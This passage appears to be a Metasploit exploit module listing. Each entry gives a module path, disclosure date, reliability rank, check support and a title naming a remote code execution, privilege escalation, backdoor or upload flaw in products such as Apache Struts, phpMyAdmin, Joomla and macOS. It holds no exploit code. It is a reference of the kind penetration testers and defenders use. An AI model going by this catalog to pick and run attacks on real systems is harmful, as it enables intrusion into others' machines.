phpFileManager 0.9.8 Remote Code Execution - multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection - multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection - multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution - multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor - multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution - multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() - multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection - multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection - multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution - multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution - multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution - multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution - multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit - multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability - multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution - multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload - multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability - multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution - multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution - multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML Deserialization Code Execution - multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution - multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution - multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution - multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution - multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability - multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution - multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution - multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution - multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass - multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload - multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection - multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution - multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution - multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution - multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution - multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution - multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection - multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection - multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE - multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution - multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution - multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution - multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution - multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution - multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution - multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution - multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution - multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution - multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution - multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution - multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow - multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload - multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload - multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability - multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass - multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution - multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution - multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution - multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution - multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload - multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload - multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution - multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection - multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution - multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution - multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution - multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE - multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution - multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload - multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload - multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload - multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution - multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection - multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload - multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload - multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution - multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution - multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution - multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload - multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution - multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE - multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow - multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation - multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation - multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID privilege escalation - multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution - multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution - multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution - multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE - multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec - multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API - multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE - multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution - multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution - multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution - multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution - multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution - multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution - multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution - multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution - multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution - multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection - multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution - multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution - multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution - multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution - multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection - multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution - multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution - multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution - multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution - multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE - multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow - multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) - multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution - multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution - multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow - multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) - multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection - multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution - multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow - multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow - multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution - multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution - multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution - multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution - multi/script/web_delivery 2013-07-19 manual No Script Web Delivery - multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution - multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve - multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution - multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution - multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow - multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution - netware/smb/lsass_cifs 2007-01-21 average No Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow - netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow - osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow - osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) - osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free - osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution - osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution - osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion - osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack - osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack - osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution - osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution - osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow - osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow - osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation - osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation - osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation - osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit - osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer - osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation - osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation - osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation - osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation - osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation - osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation - osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass - osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation - osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) - osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow - osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow - osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow - osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) - qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation - qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow - solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation - solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation - solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation - solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution - solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow - solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) - solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow - solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution - solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution - solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability - solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow - unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) - unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) - unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution - unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution - unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution - unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution - unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution - unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution - unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution - unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload - unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) - unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) - unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution - unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection - unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense - unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE - unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE - unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection - unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution - unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution - unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution - unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution - unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution - unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence - unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation - unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation - unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation - unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation - unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit - unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution - unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution - unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution - unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability - unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection - unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution - unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow - unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape - unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) - unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC - set_time_zone Unath RCE - unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution - unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability - unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution - unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution - unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution - unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution - unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution - unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution - unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include - unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution - unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution - unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution - unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution - unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution - unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution - unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution - unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection - unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution - unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution - unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection - unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution - unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability - unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload - unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution - unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution - unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution - unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability - unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution - unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling - unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution - unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection - unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability - unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution - unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution - unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution - unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution - unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution - unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution - unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution - unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution - unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability - unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution - unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload - unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection - unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability - unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload - unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include - unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection - unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload - unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution - unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution - unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution - unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection - unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability - unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload - unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution - unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability - unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution - unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution - unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution - unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection - unix/webapp/oscommerce_filemanager 